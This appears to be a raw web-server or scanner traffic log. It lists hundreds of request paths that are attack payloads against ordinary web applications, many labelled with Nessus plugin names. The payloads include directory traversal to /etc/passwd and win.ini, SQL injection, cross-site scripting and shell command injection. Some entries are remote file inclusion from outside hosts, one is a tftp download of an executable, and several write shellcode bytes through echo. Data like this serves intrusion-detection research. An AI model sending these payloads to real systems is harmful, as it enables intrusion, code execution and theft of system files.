/examples/servlets/servlet/listrec.pl?app=qmh-news&template=;ls /etc| /phpmyadmin/resetpw.php?email=../../../../../../../../../../../../etc/passwd /en-us/account/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd /ows-bin/vssetcookie.exe /scripts/docs/changes /scgi-bin/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /m5103snj.php? /l13b77e5.html? /top.php?stuff=ver\x09>q91857824&rem\x09 /en-us/account/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/ipb5ri?? /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /rbec2ohx.exe? /3m5knyc4.html? /fmnveedu.php? /l752x1ry.do? /phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs" or (sleep(4)+1) limit 1 -- /b1q8bywu.mscgi? /javascript/serve.exe /scgi-bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /main.php?logout="|ping\x0b-w\x0b9000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b /t578vqea.aspx? /examples/jsp/sessions/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\x00 /examples/jsp/calsearch_results.dot?search_query=nessus">/ /main.php?stuff=ver\xa0>q67222935&rem\xa0 /iv5vkgam.asp? /top.php?stuff="|ping\x0b-w\x0b8000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /dslpwt15.aspx? /fo564rei.x? /_mem_bin/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\+/og /7uz3ok60.do? /javascript/shoutbox.exe /raanw4ia.php? /main.php?stuff="del\x0bq67582951&rem\x0b /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908854,0x3a,1781864537),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 /xsqln7eb.php3? /help.php?q='uname >q62656229 # /rv98iwjp.html? /d765w06j.aspx? /fmnveedu.nsf? /en-us/n9xlumt5.fts? /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/tvwonjvwux.sh+>+/dev/null+&')."]=1 /examples/servlets/servlet/index.php?op=default&date=200607' union select 1,856108099,1,1,1,1,1,1,1,1--&blogid=1 /scripts/day.php /scripts/index.php?option=frontpage&itemid=2|system(id)|1331908729 /examples/jsp/error/admin/admin.php?sid=0' /help.php?q="&uname\x09>q57946156\x09# /scripts/includes/converter.inc.php?include_path=/etc/passwd\x00 /scriptsearchdaily/ / /htbin/testcgi.exe /help.php?q='uname\x09>q19574333\x09# /manager/top.php?header=../../../../../../../../etc/passwd /6dlc2zm9.exe? /examples/jsp/error/server.pt?open=space&name=";} /cacti/admin/configset.php?settings_dir=/etc/passwd\x00 /zv8tv7h8.nsf? /scripts/search.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il?? /scripts/qbch5ojumj32.php3 / /help.php?q=;uname\x09>q84834127\x09# /index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904419',null,null,null,null -- /examples/jsp/jsp2/jspx/sojourn.cgi?cat=../../../../../etc/passwd\x00 /examples/jsp/num/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /index.php?node=system&op=block&block=3&bop=more /igtf0zon.asp? /d7ktpmcq.htm? /cgi-bin/testcgi.exe /de3v2dd9.jsp? /n9xlumt5.mscgi? /main.php?stuff=rm;q27761754&rem; /hipkz026.aspx? /phpmyadmin/documentation.html?phpmyadmin=<<<<<<<<<>>>> /examples/jsp/checkbox/phptonuke.php?filnavn=/etc/passwd /main.php?logout="&rm,q77644543&rem, /gy23xnjq.cgi? /main.php?logout="uname >q44662571 # /en-us/account/nessus">/ /help.php?q="ver >q97915511&rem /main.php?stuff="ping,-w,10000,-n,1,1.2.3.4&rem, /components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=id /scripts/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /top.php?stuff=ping;-w;10000;-n;1;1.2.3.4&rem; /javascript/children.exe /uvazfs7p.asp? /serverscripts/ /jackrabbit/search.jsp?q=%" /examples/jsp/error/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /main.php?stuff="rm\x09q91227717\x09# /main.php?logout="&rm\x0cq99238383&rem\x0c /cgi-bin/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl /examples/jsp/jsp2/jspx/index.cfm?fuseaction=category.display&category_id=' /help.php?q=&ver >q99146784&rem /nyjgaorz.jsp? /awstats/awstats.pl?migrate=|echo;echo x;echo|awstats969999.txt /examples/jsp/num/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00 /help.php?q='rm q62656229 # /javascript/motd.exe /help.php?q=&ver >q86966717&rem /0z575z74.x? /yver8r9o.asp? /../../../../../windows/win.ini /cgi-perl/cgi-test.exe /top.php?stuff="&ver,>q25287739&rem, / /help.php?q="rm\xa0q23773279&rem\xa0 /7o5qp766.htm? /javascript/domains.exe /scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331923194 /help.php?q=ver >q66395663&rem /help.php?q="&rm,q46141422&rem, /port.php?proto=tcp' /examples/jsp/error/base_qry_common.php?base_path=/etc/passwd\x00 /scripts/shopexd.asp?catalogid='42 /main.inc.php?pathtoscript=http://192.168.202.96:8080/4dckqcc0acprbz? /.shtml /bdf_scripts/ /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+del+olnb /user.php?uname=1&module=ns-lostpassword&op= /recordings/calendar.php?month=' union select 1,1,'1331918998','calendarix_month_sql_injection.nasl',1 # /examples/jsp/cal/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /help.php?q="rm\x0bq87717318&rem\x0b /javascript/htpasswd.cc /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=lfu_7eugo7nlzqnjz /top.php?stuff=';sleep\x0911\x09# /scriptingnews2/ /edzaia0i.html? /main.php?stuff=';del q22931533 # /i2n4v4rl.cfm? /scripts/search.jsp?q=%" /scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1332010406,4,5 /ju0u7kfo.nsf? /examples/servlets/servlet/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /andromeda.php?q=s&sm=fi&s=&x=9&y=7 /7o5qp766.nsf? /examples/jsp/error/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /examples/jsp/jsp2/el/shoutbox.php?conf=../ /en-us/ddoworrl.cfm? /bn857frh.htm? /d765w06j.html? /examples/jsp/checkbox/demos/demo.browse.php?filename=/etc/passwd /q703m78q.x? /main.php?stuff="&del q44697755 # /javascript/.htaccess.sfish/'"'"'"'" /nyvbv05h.exe? /examples/servlets/servlet/index.php?chemin=../../../../../../..//etc /news/index.dot?id=../../../../../../../../../../../..//boot.ini\x00.jpg /mv8wxfy9.php3? /jnt3f86c.cfc? /main.php?stuff="ping\x0b-w\x0b7000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /examples/jsp/colors/core/editor.php?editor_insert_bottom=/etc/passwd /odzk29aa.htm? /sourcecode_scripts/ /ghswfouu.fts? /help.php?q="&rm,q45293431&rem, /main.php?logout='\x0asleep\x0910\x09# /o6ebbirj.htm? /static//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd /82q7ywa8.htm? /scripts/index.php?id='union/**/select/**/0,0,553136338,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /t7tm4m0b.cgi? /cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919008,1645922045 -- /phpmyadmin/www/delivery/ac.php?bannerid=-1331904221+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ucypkczy]));die;/* /sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd /i2n4v4rl.pl? /examples/jsp/colors/sojourn.cgi?cat=../../../../../etc/passwd\x00 /main.php?logout=';del\x09q79392194\x09# /admin/scripts/fckeditor/ /opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\x00 /javascript/edu.exe /manager/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00 /help.php?q=ping;-w;8000;-n;1;1.2.3.4|rem; /phpmyadmin/documentation.html?phpmyadmin='" /mail.php?id='/**/union/**/select/**/1,2,1331923205,4--&blog=1 /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../vtigerservice.php\x00 /iajtej82.cfc? /script/menu/menuadministration.php?path_inc=http://192.168.202.118:8080/ghl9il? /fc9t54l7.exe? /cacti/showproduct.php?product=1' /main.php?logout="ping\x0b-w\x0b9000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /interscan/cgi-bin/ftpsave.dll?i'm here /exchange/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og /bxnyrhmh.x? /7uz3ok60.pl? /5o9zq43e.fts? /main.php?stuff="&rm q33239588 # /javascript/serial.exe /cgi-bin/cvslog.cgi?file= /main.php?logout="|ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /cgi-home/pfdispaly.cgi?../../../../../../../../../../etc/passwd /scripts/qbch5ojumj32.inc /hrttz9fj.idc? /recordings/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+61+c3+60+52+53+33+c0+e8+0a+00+00+00+5b+5a+03+d8+2b+d0+75+ef+61+c3++>>ctdn /javascript/edit.exe /main.php?logout="ping\x09-w\x0910000\x09-n\x091\x094.3.2.1|rem\x09 /ydexw8by.do? /cgi-bin/search.jsp?q=%" /ghswfouu.exe? /recordings/kb.cgi?view='&lang=en /htbin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /recordings/index.php?sensor_program= /admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/iroy1gvqrrqu? /javascript/bins.exe /examples/jsp/jsp2/jspx/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../vtigerservice.php\x00 /cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332010414','5'-- /main.php?logout='\x0auname\x09>q29624474\x09# /top.php?stuff="&ver\x0c>q18822244&rem\x0c /o6ebbirj.cfm? /bzuf9ozq.php? /help.php?q="&ping\x0b-w\x0b11000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /cacti/docs.php?doc=../jpgraph-1.12.1/docs/index /examples/jsp/jsp2/jspx/directory.php?dir=;cat /etc/passwd /byrg33fw.cfm? /examples/jsp/jsp2/el/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /weq93ppb.php? /javascript/mbox.exe /top.php?stuff='\x0ddel\x09q21461883\x09# /lmw4r201.do? /examples/jsp/jsp2/el/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h /kpscripts/ /mpcgi/fileseek2.cgi?foot=&head=;cat /etc/passwd| /top.php?stuff='|sleep 10 # /scripts/webadmin.php?show=/etc/passwd /cgi-sys/gw5/gwweb.exe?htmlver=aaa&get-context /subscriptions.properties /quagynka.do? /scgi-bin/fileseek.cgi?foot=&head=;cat /etc/passwd| /index.php?|=../../../../../../../../../etc/passwd /6dlc2zm9.nsf? /cgi-bin/whois.cgi?lookup=;&ext=/bin/cat /etc/passwd /examples/jsp/colors/top.php?header=../../../../../../../../etc/passwd /zv8tv7h8.dll? /82q7ywa8.jsp? /byrg33fw.do? /scripts/admin/admin.php?sid=0' /o35zot2r.fts? /scripts/_admin/ /cgi-bin/perl.exe /help.php?q="rm\x09q34493999&rem\x09 /cat-scripte/ /help.php?q="ping,-w,11000,-n,1,1.2.3.4|rem, /École_marketing/ /scripts/sql/install-0.9.7.php?p=2 /j2kdmfw4.fts? /uc3w3bdi.do? /transcript_day1/ /main.php?logout=ver;>q78779487&rem; /cacti/wa.exe?debug-show-version /i7prbs22.fts? /scripts/index.php?id=hw828khs0f' /coursedescriptions06/ /examples/jsp/sessions/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/colors/gadgets/blog/blogmodel.php?path=/etc/passwd\x00 /main.php?logout="&del\x0cq71167917&rem\x0c /scripts/admin.php?loggedin=1 /0u75ldxq.nsf? /ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd /javascript/dumps.exe /scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331905219','5'-- /hipkz026.fts? /s7qus4g3.idc? /jdx255ea.x? /call me when you're sober/ /igtf0zon.htm? /manager/index.php?name=your account&profile=anyone"> /examples/jsp/colors/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login /manager/index.php?search='>&searchmode=f /main.php?stuff=&ver\xa0>q58155175&rem\xa0 /javascript/def.exe /carisoprodol_prescription/ /examples/jsp/sessions/nessus"> /index.php?ando=comentarios&entrada=1'generate error /en-us/account/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /manager/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /x7pclv4s.dll? /javascript/clear.exe /manager/story.pl?next=../../../../../etc/passwd\x00 /scripts/welcome.php?custom_welcome_page=/etc/passwd\x00 /zmvq66jy.cfm? /zln2hm2z.fts? /examples/jsp/error/home/search.asp?nchannel='1 /bzuf9ozq.cfc? /en-us/app/xss/flashtimeline /main.php?stuff="ver\xa0>q89318346&rem\xa0 /webcgi/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /q703m78q.php3? / /main.php?stuff=";uname >q31473843 # /n1afe1y6.html? /internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini /scripts/index.php?option=frontpage&itemid=2|system(id)|1332009306 /j734qobz.htm? /modules.php?name=stories_archive&sa=show_month&year=2002&month=03&month_l= /carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog /examples/jsp/sessions/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /main.php?logout='\x0adel\x09q29624474\x09# /'.$_server['php_self'].'?'.$_server['query_string'].'&act=img&img=change /phpmyadmin/direct.php?rf=/etc/passwd\x00 /j734qobz.php? /phpmyadmin/file.php?path=/etc/passwd\x00 /javascript/.passwd.dump /examples/jsp/error/cvslog.cgi?file= /javascript/forum1.exe /direct.php?rf=/etc/passwd\x00 /scripts/backofficeplus/comersus_backoffice_index.asp /javascript/wa.exe /? /rv98iwjp.exe? /miz4r5hz.mscgi? /manager/index.php?id=0rop9yeuxw' /scripts/admin/define.inc.php?match=http://xxxx./ /recordings/forum.php?do=viewtopic&cat=1&topic=1&page=1? /top.php?stuff="del\xa0q56682636&rem\xa0 /tim post's tomorrow/ /help.php?q="&ver\x0b>q12933545&rem\x0b /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908877,462918967 -- /cgi-914/r.cgi?file=../../../../../../../../../../etc/passwd /examples/jsp/colors/php.cgi?/etc/passwd /confirmunsubscription.php?output=http://192.168.202.96:8080/4dckqcc0acprbz? /users.php?mode=profile&uid=<script>alert(document.cookie)</script> /main.php?stuff="&rm;q22147997&rem; /ywaxntrx.cgi? /9ko6m4c8.nsf? /main.php?logout="&ping\x09-w\x0910000\x09-n\x091\x094.3.2.1&rem\x09 /javascript/.ssh.exe /help.php?q="rm q77224434&rem /yver8r9o.jspa? /um7xpn15.jsp? /default.php?info_message= /main.php?logout=;sleep\x097\x09# /q703m78q.jspa? /examples/jsp/jsp2/jspx/protection.php?action=logout&siteurl=/etc/passwd /activatemember?activatecode=&member="> /space1105xss_485/ /jack's big tit show/ /iajtej82.html? /en-us/7o5qp766.asp? /phpmyadmin/help.php?section='qualiteam_xcart_sql_xss.nasl /cgibin/fileseek2.cgi?foot=&head=;cat /etc/passwd| /examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6116917755.old /cgis/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /manager/bb-hist.sh?histfile=../../../../../etc/passwd /recordings/install.php?newlang=../../cpg_error.log\x00 /help.php?q=ver,>q57259291&rem, /3j8echh0.asp? /javascript/squirrelmail.exe /j4rdyhw8.php3? /examples/jsp/checkbox/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00 /3j8echh0.cfm? /pi_transcript/ /j4drbkil.kspx? /j2kdmfw4.jsp? /top.php?stuff="rm\x0bq12768472&rem\x0b /cgi-bin/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\+/og /main.php?logout=';del q89385457 # /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /j4rdyhw8.kspx? /manager/wa.exe?debug-show-version /javascript/.passwd.test /fmnveedu.jsp? /help.php?q=";del\x09q32988845\x09# /scripts/rvckwz6smkqf.sh /javascript/menu.exe /main.php?stuff="rm\xa0q67484693&rem\xa0 /javascript/~john.exe /examples/jsp/jsp2/jspx/forum.php?do=viewtopic&cat=1&topic=1&page=1? /examples/jsp/jsp2/jspx/login.php?course="> /javascript/product_info.exe /prescription-zyrtec/ /en-us/9kr0ih0v.x? /v3axg1p8.cgi? /examples/jsp/sessions/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /setup-script/ /cgi-bin/visadmin.exe /zmvq66jy.x? /x7pclv4s.exe? /cacti/js/scripts.php?load=/etc/passwd\x00 /phpmyadmin/directory.php?dir=;cat /etc/passwd /examples/jsp/jsp2/el/index.php?entry=' /help.php?q="&ver\xa0>q55891755&rem\xa0 /scripts/..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1../winnt/system32/cmd.exe?/c+dir+c:\+/og /help.php?q="ping,-w,9000,-n,1,1.2.3.4|rem, /cgi-bin/../../../../../../../../../../winnt/system32/ipconfig.exe /javascript/notify.exe /zmvq66jy.htm? /examples/jsp/jsp2/el/base_local_rules.php?dir= /examples/jsp/num/help.php?section='qualiteam_xcart_sql_xss.nasl /scripts/ui/login?user=nessus-1332010196 /w4996nr0.idc? /byrg33fw.aspx? /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16 /top.php?stuff="|sleep\x099\x09# /cgi-bin/index.php?src=1&_common=1&time=1331908739&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /examples/jsp/checkbox/user.cgi?url=">&from=add /examples/jsp/sessions/starnet/addons/slideshow_full.php?album_name='2425357 /rv98iwjp.cgi? /vac1l5vm.jsp? /php_scripts/ /top.php?stuff=;rm q61859553 # /examples/jsp/sessions/survey.inc.php?path=/etc/passwd\x00 /t578vqea.jsp? /g3w7y7u5.pl? /javascript/intro.exe /r02_pac'slife/ /copatranscript_20061115/ /javascript/moved.exe /o6ebbirj.nsf? / /nessus"> /vac1l5vm.nsf? /examples/jsp/jsp2/jspx/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd /help.php?q="|ping;-w;10000;-n;1;4.3.2.1|rem; /help.php?q='rm\x09q97653798\x09# /top.php?stuff="ping -w 8000 -n 1 4.3.2.1|rem /examples/jsp/jsp2/jspx/cvslog.cgi?file= /www/delivery/ac.php?bannerid=-1331908788+or+1=1+--+';passthru(base64_decode($_server[http_nessus_s3jekbai]));die;/* /main.php?stuff='&del\x09q28979577\x09# /manager/rot13sj.cgi?/etc/passwd /en-us/account/cwmail.exe /scripts/search.php?submit=true&search='); /viewcart.asp?userid=' /examples/jsp/error/webadmin.php?show=/etc/passwd /7dbjwpw6.pl? /scripts/listinfo/ /b1q8bywu.htm? /websense/cgi-bin/wscgilogin.exe?page=login&username=nessus"> /cgi.cgi/texis.exe/junk /examples/jsp/sessions/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /dir_thatware/config.php?root_path=http://192.168.202.96:8080/llumt7msyau5y?' /scriptpath/index.php?page=http://192.168.202.96:8080/llumt7msyau5y? /weq93ppb.html? /scripts/t769qwej0llr.asp /nuh3zirz.cgi? /script_colorcod/ /rbec2ohx.cgi? /scripts/search.jsp?q=%" /main.php?stuff="uname\x09>q51339959\x09# /h5i6crm3.jsp? /cgi-exe/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /main.php?stuff="&ping -w 7000 -n 1 4.3.2.1&rem /main.php?stuff="\x0arm\x09q72429699\x09# /top.php?stuff=&rm;q55714714&rem; /main.php?stuff="&del\x09q54676593\x09# /bandwidth/index.cgi?action=showmonth&year=&month= /examples/jsp/nummultihtml.pl?multi=/etc/passwd\x00html /en-us/account/admin/configset.php?settings_dir=/etc/passwd\x00 /examples/jsp/cal/sendtemp.pl?templ=../../../../../etc/passwd /17-doin' time/ /scripts/nph-mr.cgi /zln2hm2z.mscgi? /examples/jsp/cal/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /cpanel_xss/ /scripts/index.php?op=default&date=200607' union select 1,2098983739,1,1,1,1,1,1,1,1--&blogid=1 /scripts/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /top.php?stuff="\x0dsleep\x099\x09# /main.php?stuff="ping\x09-w\x099000\x09-n\x091\x091.2.3.4&rem\x09 /scripts/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html /examples/jsp/num/wiki.php/ /h5i6crm3.php? /top.php?stuff="|ping\xa0-w\xa07000\xa0-n\xa01\xa04.3.2.1|rem\xa0 ///../../../../boot.ini /main.php?frm_daynight=day&frm_passwd=&frm_referer=q99411377&frm_user=&scr_height=&scr_width= /examples/servlets/servlet/activatemember?activatecode=&member="> /examples/jsp/sessions/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /transcription/ /lmw4r201.idc? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+24+1c+50+6a+00+68+65+73+73+00+68+50+72+6f+63+68+74+69+6f+6e+68+6f+72+6d+61++>>ctdn /bin/fpsrvadm.exe /scripts/plog-rss.php?level=collection&id=999 or plogger_id_sql_injection.nasl /cacti/kb.cgi?view='&lang=en /recordings/base_qry_common.php?base_path=/etc/passwd\x00 /ghswfouu.aspx? /recordings/pfdispaly.cgi?../../../../../../etc/passwd /help.php?q='uname\x09>q87915929\x09# /examples/jsp/checkbox/includes/config.php?relative_script_path=http://xxxxxxx /cgi-bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /j4oqyvga.html? /en-us/fo564rei.asp? /l13b77e5.x? /g8nu2yy7.pl? /main.php?stuff="&rm\x09q54676593\x09# /? /j4oqyvga.asp? /main.php?logout="\x0drm\x09q32424996\x09# /h5i6crm3.pl? /scripts/proxy/w3proxy.dll /7uz3ok60.dll? /7uz3ok60.asp? /javascript/document.log /cgi-bin/language.php?data_dir=/etc/passwd\x00 /i686v90l.cgi? /fo564rei.php? /pdfdescription/ /en-us/w4996nr0.x? /8t9v8k7x.jspa? /recordings/cvslog.cgi?file= /opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/vir0v3xfc?\x00 /help.php?q="rm\x09q96611289\x09# /site_scripts/ /en-us/33y9gcqq.asp? /h21y8w52.html? /awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0174\0044\0000\0377\0347" >> /tmp/qcywjpzuja0;echo|awstats577013.txt /phpmyadmin/index.php?name=your account&profile=anyone"> /javascript/pt.exe /cgi-sys/texis.exe/junk /en-us/h5sc3gxy.cgi? /main.php?stuff="&ping\x09-w\x0911000\x09-n\x091\x091.2.3.4&rem\x09 /main.php?stuff="del\x09q12267523&rem\x09 /examples/jsp/checkbox/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00 /examples/jsp/num/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00 /scripts/wa.exe?debug-show-version /index.php?c=access&a=login&ref_c=nessus">&ref_a=projectpier_login_page_xss.nasl"> /..\..\..\..\..\..\..\..\..\..\/windows/win.ini /top.php?stuff="&ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /main.php?stuff="sleep\x099\x09# /cgi-local/msmmask.exe?mask=/junk334 /l752x1ry.exe? /examples/jsp/jsp2/jspx/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd /? /top.php?stuff="\x0adel q56276124 # /cgi-bin/calendar.php?serverpath=/etc/passwd\x00 /javascript/.passwd.pl /cgi-bin/uploader.exe /scripts/2k1m.exe?/x+/c+tftp -i 192.168.202.118 get hvtftjuy dgkirazl.exe /en-us/account/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00 /examples/servlets/servlet/classes/adodbt/sql.php?classes_dir=/etc/passwd\x00 /en-us/account/cal_week.php?op=week&catview=999' /zuihld5m.htm? /examples/jsp/jsp2/el/index.php?mod_id=2&kb_ask= /en-us/account/al_initialize.php?alpath=/etc/passwd\x00 /nmw0do67.cgi? /en-us/account/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00 /javascript/pop3.exe /apavxugx.do? /javascript/submissions.exe /cgi-bin/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00 /recommend.php?id=' /mv8wxfy9.cfc? /cgi-win/.htpasswd /bin/cfgwiz.exe /subscriptions.core /cgi-bin/includes/converter.inc.php?include_path=/etc/passwd\x00 /main.php?stuff='&sleep\x098\x09# /hotmail_xss/ /cacti/ion-p.exe?page=../../../../../etc/passwd /examples/jsp/colors/user.cgi?url=">&from=add /javascript/bat.exe /javascript/httpd.exe /javascript/monitors.exe /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/tmcrsoeqnm0;'); function v /javascript/_adm.exe /scripts/psunami.cgi?file=|id| /scripts/mail.php?id='/**/union/**/select/**/1,2,1331919224,4--&blog=1 /6n7aacgg.dll? /help.php?q='\x0arm\x09q79344163\x09# /phpmyadmin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null -- /a0imiuf1.exe? /scripts/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id /javascript/~jacob.exe /3m5knyc4.htm? // /subscription/ /en-us/esmozg5d.fts? /phpmyadmin/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /en-us/account/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00 /javascript/webaccess.exe /htbin/fileseek2.cgi?foot=&head=;cat /etc/passwd| /i2n4v4rl.nsf? /javascript/alias.exe /6n7aacgg.cgi? /dda2qr7j.jsp? /bn857frh.jspa? /main.php?logout="&uname\x09>q84263823\x09# /examples/jsp/sessions/search= /main.php?stuff='&del q97413885 # /scripts/tinfo.php?id=1332009304 //

/cgi-bin/index.php?src=1&_common=1&time=1331923205&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /help.php?q="&del q92537281&rem /1qwv2p5p.exe? /examples/jsp/cal/index.php?id='union/**/select/**/0,0,1317538123,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /main.php?stuff="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /cgi.cgi/gw5/gwweb.exe?htmlver=aaa&get-context /top.php?stuff='&rm\x09q76725442\x09# /javascript/text-base.exe /main.php?logout='del q29138864 # /examples/jsp/error/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00 /search.cgi?..\..\..\..\..\..\windows\win.ini /top.php?stuff="|ping -w 11000 -n 1 1.2.3.4|rem /inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/ghl9il? /actscript2/ /javascript/tree.exe /main.php?stuff="ping\x0b-w\x0b8000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /scripts/man2html?section=-p id&topic=w /javascript/bill.exe /top.php?stuff='sleep\x0911\x09# /examples/jsp/cal/admin/admin.php?sid=0' /subscriptinfo/ /nph-script/ / /tuwjta1w.cfm? /examples/jsp/colors/edit.jsp?page=user&editor=../../../install /cacti/check_user_id.php?user_id= /cgi-bin/fpsrvadm.exe /scripts/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00 /cgi-bin/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id /vmi8bb12.asp? /javascript/e2fs.exe /x2gyorli.asp? /administrator/gallery/gallery.php?directory=\" /main.php?logout="|ping\xa0-w\xa09000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /interface/login/login_frame.php?site='injected_param /i2n4v4rl.jsp? /examples/jsp/sessions/index.php?gadget=glossary&action=viewterm&term= /scripts/polls.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt?? /help.php?q="|sleep 10 # /editor's-blog/ 